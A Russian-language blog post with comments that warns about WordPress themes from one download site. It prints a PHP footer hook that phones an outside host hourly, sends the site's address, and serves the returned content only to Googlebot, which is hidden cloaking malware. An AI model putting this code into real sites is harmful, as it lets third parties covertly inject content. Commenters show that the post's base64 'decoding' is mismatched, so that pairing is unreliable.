Внимание вредоносный код в темах для Вордпресс!


 

Встречались ли Вы с таким??? НЕТ? А вот лично я сегодня встретился. Спасибо добрые люди, в лице Atrax’a помогли и предостерегли, а могло бы и не очень красиво закончится.

Теперь мой долг предостеречь Вас!

1. Запомните сайт http://wpthemes.ru/ и никогда туда не ходите, особенно если Ваши познания в вордпрессе начинаются и заканчиваются — «» — этими скромными навыками.

2. Теперь второе: Где это вредоносный код обычно скрывается? Ответ: На вышеприведенном сайте в файлах — sidebar.php, functions.php и footer.php.

3. Как этот код примерно выглядит? Вот он сволочь (прим.-из footer.php):
echo(base64_decode(«0JvQvtC60LDQu9C40LfQsNGG0LjRjyA8YSBocmVmPSJodHRwOi8vd3B3b3JsZC5
ydSIgdGl0bGU9ItCc0LjRgCBXb3JkcHJlc3MiIHRhcmdldD0iX2JsYW5rIj7QnNC40YAgV29yZHByZXNzPC9hPi4
g0KLQtdC80LAg0L/QtdGA0LXQstC10LTQtdC90LAg0L3QsCDRgdCw0LnRgtC1IDxhIGhyZWY9Imh0dHA6L
y93cHRoZW1lcy5ydSIgdGl0bGU9ItCi0LXQvNGLINC00LvRjyBXb3JkcHJlc3MiIHRhcmdldD0iX2JsYW5rIj7Qot
C10LzRiyDQtNC70Y8gV29yZHByZXNzPC9hPi4=»));?>

4. Расшифровка кода, полюбуйтесь:
function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var(«SELECT option_value FROM $wpdb->options WHERE option_name=’adwb_opt’»))
$adwb_opt = unserialize($adwb_opt);
else{
$adwb_opt = array(0,»);
$wpdb->query(«INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES (‘adwb_opt’, ‘».serialize($adwb_opt).»‘, ‘no’)»);
}
if ((time()-$adwb_opt[0]) >= 3600) {
$adwb_host = ‘blogcell.net’;
$adwb_get = ‘/wpam/’;
$adwb_soc = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,»GET $adwb_get».’?h=’.urlencode($_SERVER['HTTP_HOST']).’&u=’.urlencode($_SERVER['REQUEST_URI']).» HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n»);
$adwb_data = »;
while(!feof($adwb_soc))
$adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,»\r\n\r\n»));
}
@fclose($adwb_soc);
if(preg_match(‘/(.+?)<\/adbug>/s’,$adwb_data,$adwb_tmp)){
$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query(«UPDATE $wpdb->options SET option_value=’».mysql_escape_string(serialize($adwb_opt)).»‘ WHERE option_name=’adwb_opt’»);
}
}
if (eregi(«googlebot»,$_SERVER['HTTP_USER_AGENT'])) echo $adwb_opt[1];
}
add_action(«wp_footer», «wp_get_footer_meta»);

5. И это еще не все! Цитата: «Гугл на вашем сайте увидит только то, что захотят показать владельцы сервера в Далласе. Бесплатный DNS, выделенный сервер, отсутствие контактной информации в записи домена…» Atrax, еще раз спасибо за информацию.

Вот такая вот экзотика! Так что будьте бдительны!
Враг не спит!

 
Статья прочитана 2062 раз(a).
 
Еще из этой рубрики:
Комментарии к записи "Внимание вредоносный код в темах для Вордпресс!"

Добавить комментарий
  1. благодарю, рад что не я первый заметил эту ужасть
    пойду гуглю нажалуюсь, чтобы исключили этот сайт из индексации

    сам выцепил бяку из темки довольно просто, благо не сильно-то и спрятали

  2. Ну, исключить «эту ужасть» из Гугла (да и Янда) вряд ли получится. Рес трастовый, тИЦ/1200 PR/3. Не думаю, что админы трояна туда специально поставили — смысл ТАК рисковать? Сайт успешно получает свои «копеечки» в Сети.:-) и — Alexa Rank 215,831

  3. И чем же интересно это Вы так расшифровывали??? Прежде чем такое писать надо бы подумать хорошенько. Вы в следующий раз засуньте абракадабру эту сюда http://base64-encoder-online.waraxe.us/ и уже потом кричите о том, что там увидели. А то вон GG сразу жаловаться побежал, а сколько таких как он пожаловались — одному гуглю и известно.
    В вашем случае раскодированный подвал выглядит так: Локализация <a href=»http://wpworld.ru» title=»Мир WordPress» rel=»nofollow»>Мир WordPress</a>. Тема переведена на сайте <a href=»http://wpthemes.ru» title=»Темы для WordPress» rel=»nofollow»>Темы для WordPress</a>. И кодируют люди чтоб ссылки на них пионеры не убирали с шаблонов.
    Сначала сами всё проверяйте, а потом уже основываясь на полученном опыте пишите.

    • Да нормально я расшифровывал… Вот видимо в пост не тот код вставил это да… В любом случае такой есть в наличии. Если не футере, то в другом файле однозначно. А футер Вы правильно раскодили, вопросов нет. Так что если кто-то и побежал жаловаться, то беды в этом не вижу. А кодируют ДАННЫЕ ЛЮДИ чужие темы (те же пионеры, только более продвинутые) и добавляют свои копирайты. Считаете это правильным???

      • Ну, по вопросам авторства- это не в моей компетенции, каждый крутится как может. Если бы это были мои темы, то чайку бы я заварил хорошего! С тем, что валяется в паблике вообще трудно разобраться кому принадлежит авторство, ибо при локализации темы можно всё «перебить» под себя, заменить пикчи и словить новую тему на выходе.
        Если ссыль с темы стоит на того, кто её адаптировал под рунет- ничего зазорного. А со значком © мало кто считается, в том числе и те люди, и я, и вы, использующий тему Leander. Пусть и фришную, но без родной ссылки «Powered by WordPress».

        • На то мы и белорусы чтобы крутиться))) С тем что в паблике валяется вообще работать не хочется, потому как один хлам, а в хламе смысл копаться ;-) ? К тому же встретить точно такую же тему раз плюнуть. С недавнего времени решил темы у буржуев брать (в долг насовсем) и русить под себя. А ссылки я сразу выкидываю лишние в том числе вордпрессовскую. Другое дело, если бы человек русил тему и мне понравилась — возможно бы оставил на переводчика.

Здесь вы можете написать комментарий к записи "Внимание вредоносный код в темах для Вордпресс!"

* Текст комментария
* Обязательные для заполнения поля
Внимание: Все отзывы проходят модерацию.

Архивы
Наши партнеры
Читать нас
Связаться с нами